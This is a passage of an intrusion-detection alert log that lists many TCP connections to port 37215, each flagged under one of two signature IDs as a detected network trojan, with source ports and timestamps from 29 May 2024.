                SID:2829579
                Source Port:36568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359798
                SID:2829579
                Source Port:51304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506922
                SID:2835222
                Source Port:54730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963029
                SID:2835222
                Source Port:44486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728996
                SID:2829579
                Source Port:45048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042083
                SID:2829579
                Source Port:40892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617556
                SID:2829579
                Source Port:59010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967257
                SID:2829579
                Source Port:45534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458027
                SID:2835222
                Source Port:52298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572901
                SID:2829579
                Source Port:56284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883189
                SID:2829579
                Source Port:40300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574510
                SID:2829579
                Source Port:34540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422386
                SID:2829579
                Source Port:50418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900409
                SID:2829579
                Source Port:55848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994546
                SID:2835222
                Source Port:37744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281443
                SID:2835222
                Source Port:42826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669730
                SID:2835222
                Source Port:46066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.930044
                SID:2829579
                Source Port:43082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506113
                SID:2829579
                Source Port:60312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776565
                SID:2835222
                Source Port:47090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432338
                SID:2835222
                Source Port:33728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824518
                SID:2829579
                Source Port:44162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322970
                SID:2835222
                Source Port:60810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784877
                SID:2835222
                Source Port:50978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913729
                SID:2835222
                Source Port:53650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914904
                SID:2829579
                Source Port:42168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028066
                SID:2829579
                Source Port:49970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782526
                SID:2835222
                Source Port:57640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899470
                SID:2835222
                Source Port:35170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420384
                SID:2829579
                Source Port:37194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209484
                SID:2835222
                Source Port:41588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380113
                SID:2829579
                Source Port:40716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113981
                SID:2835222
                Source Port:55728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659640
                SID:2829579
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.943054
                SID:2829579
                Source Port:48622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281550
                SID:2835222
                Source Port:41050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362753
                SID:2835222
                Source Port:41640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532174
                SID:2829579
                Source Port:51848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227642
                SID:2835222
                Source Port:34468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136279
                SID:2835222
                Source Port:39030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714323
                SID:2829579
                Source Port:44726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712458
                SID:2829579
                Source Port:52574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363007
                SID:2829579
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520351
                SID:2835222
                Source Port:48604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866032
                SID:2835222
                Source Port:58488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.422206
                SID:2835222
                Source Port:51978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929112
                SID:2835222
                Source Port:33502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174609
                SID:2835222
                Source Port:34798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809237
                SID:2835222
                Source Port:52648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652074
                SID:2835222
                Source Port:47348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615068
                SID:2835222
                Source Port:49356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868186
                SID:2835222
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843401
                SID:2829579
                Source Port:47854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.945001
                SID:2829579
                Source Port:42910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325587
                SID:2829579
                Source Port:55912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384355
                SID:2835222
                Source Port:35338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969712
                SID:2835222
                Source Port:48356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817144
                SID:2835222
                Source Port:38668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002009
                SID:2835222
                Source Port:59354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223410
                SID:2835222
                Source Port:46098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.897908
                SID:2829579
                Source Port:41282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784839
                SID:2835222
                Source Port:58444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868201
                SID:2829579
                Source Port:54652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663715
                SID:2829579
                Source Port:44276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597960
                SID:2829579
                Source Port:51930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.230084
                SID:2829579
                Source Port:48458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508730
                SID:2835222
                Source Port:59158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669321
                SID:2829579
                Source Port:41304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900170
                SID:2835222
                Source Port:49560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168828
                SID:2829579
                Source Port:36702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897469
                SID:2829579
                Source Port:45108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335244
                SID:2835222
                Source Port:57410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509683
                SID:2835222
                Source Port:58848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928299
                SID:2829579
                Source Port:36312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503618
                SID:2829579
                Source Port:35116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.043971
                SID:2829579
                Source Port:53712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.552198
                SID:2829579
                Source Port:36618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854538
                SID:2835222
                Source Port:58260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654965
                SID:2835222
                Source Port:50894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218253
                SID:2835222
                Source Port:36248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833558
                SID:2835222
                Source Port:36062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833604
                SID:2835222
                Source Port:53944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417651
                SID:2829579
                Source Port:51666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.044962
                SID:2829579
                Source Port:53660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111778
                SID:2835222
                Source Port:44262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896659
                SID:2835222
                Source Port:45026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654523
                SID:2829579
                Source Port:35750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915980
                SID:2835222
                Source Port:37446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.814588
                SID:2835222
                Source Port:50660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807352
                SID:2835222
                Source Port:39814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853291
                SID:2829579
                Source Port:35890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668924
                SID:2835222
                Source Port:40270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561053
                SID:2835222
                Source Port:44800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172884
                SID:2829579
                Source Port:47424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336329
                SID:2829579
                Source Port:53190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663190
                SID:2835222
                Source Port:37532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784818
                SID:2835222
                Source Port:40874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972356
                SID:2829579
                Source Port:41744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042538
                SID:2829579
                Source Port:36318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324435
                SID:2835222
                Source Port:60898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385147
                SID:2829579
                Source Port:57350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811699
                SID:2829579
                Source Port:60184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180886
                SID:2835222
                Source Port:47060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893770
                SID:2835222
                Source Port:54888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532677
                SID:2829579
                Source Port:53478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.271440
                SID:2829579
                Source Port:38794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717769
                SID:2829579
                Source Port:36756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500724
                SID:2835222
                Source Port:48318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508223
                SID:2835222
                Source Port:52632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547589
                SID:2829579
                Source Port:51788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610048
                SID:2829579
                Source Port:41496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510098
                SID:2829579
                Source Port:40986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901395
                SID:2829579
                Source Port:46670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714606
                SID:2835222
                Source Port:56642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.798720
                SID:2835222
                Source Port:60328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617333
                SID:2829579
                Source Port:55938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231444
                SID:2829579
                Source Port:49016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165749
                SID:2835222
                Source Port:36276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.733560
                SID:2835222
                Source Port:48824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665340
                SID:2829579
                Source Port:46818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.786708
                SID:2835222
                Source Port:53756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969974
                SID:2835222
                Source Port:59512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843346
                SID:2829579
                Source Port:45934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.980693
                SID:2829579
                Source Port:36092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852511
                SID:2829579
                Source Port:46112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362877
                SID:2835222
                Source Port:40614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702010
                SID:2835222
                Source Port:39914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166422
                SID:2835222
                Source Port:41118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320397
                SID:2829579
                Source Port:51162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369730
                SID:2829579
                Source Port:51450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896693
                SID:2835222
                Source Port:49578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560788
                SID:2835222
                Source Port:48592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887625
                SID:2829579
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165007
                SID:2829579
                Source Port:34342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229118
                SID:2829579
                Source Port:38134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464102
                SID:2835222
                Source Port:51312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109192
                SID:2829579
                Source Port:52180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651815
                SID:2835222
                Source Port:60216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659653
                SID:2835222
                Source Port:54064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.964125
                SID:2829579
                Source Port:55488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065281
                SID:2829579
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685713
                SID:2835222
                Source Port:48016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.803239
                SID:2835222
                Source Port:42974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243083
                SID:2835222
                Source Port:58418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686900
                SID:2835222
                Source Port:39956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610136
                SID:2829579
                Source Port:33012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928645
                SID:2829579
                Source Port:59316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561863
                SID:2829579
                Source Port:47962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023515
                SID:2829579
                Source Port:51298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891510
                SID:2835222
                Source Port:43572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584208
                SID:2835222
                Source Port:57928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617603
                SID:2835222
                Source Port:38652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788400
                SID:2829579
                Source Port:51900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265839
                SID:2835222
                Source Port:41430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871728
                SID:2835222
                Source Port:40452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716022
                SID:2829579
                Source Port:35776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779830
                SID:2835222
                Source Port:54112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900407
                SID:2829579
                Source Port:41408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381286
                SID:2829579
                Source Port:44054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333594
                SID:2835222
                Source Port:46940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359865
                SID:2829579
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227867
                SID:2829579
                Source Port:56224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982534
                SID:2835222
                Source Port:40654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787075
                SID:2829579
                Source Port:50528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065246
                SID:2829579
                Source Port:58728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766407
                SID:2835222
                Source Port:47546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868904
                SID:2835222
                Source Port:39028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141213
                SID:2829579
                Source Port:55892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518023
                SID:2835222
                Source Port:41012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631783
                SID:2829579
                Source Port:60190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165302
                SID:2829579
                Source Port:33978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559950
                SID:2829579
                Source Port:42586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653938
                SID:2829579
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877788
                SID:2829579
                Source Port:42860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586666
                SID:2829579
                Source Port:40754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.916080
                SID:2829579
                Source Port:33476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.264959
                SID:2835222
                Source Port:53716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.087330
                SID:2835222
                Source Port:49690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673491
                SID:2835222
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374227
                SID:2835222
                Source Port:50634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.722161
                SID:2829579
                Source Port:44378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418838
                SID:2829579
                Source Port:42102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076499
                SID:2829579
                Source Port:49256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.960396
                SID:2835222
                Source Port:50178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617688
                SID:2829579
                Source Port:33378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369679
                SID:2835222
                Source Port:53122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638947
                SID:2829579
                Source Port:35898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179860
                SID:2829579
                Source Port:39832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385800
                SID:2835222
                Source Port:49388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223057
                SID:2835222
                Source Port:50990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.649739
                SID:2829579
                Source Port:42524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223829
                SID:2835222
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711810
                SID:2829579
                Source Port:39922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992799
                SID:2835222
                Source Port:35714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609799
                SID:2835222
                Source Port:41254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394634
                SID:2835222
                Source Port:41942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.657749
                SID:2829579
                Source Port:44966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286759
                SID:2829579
                Source Port:46822
                Destination Port:37215
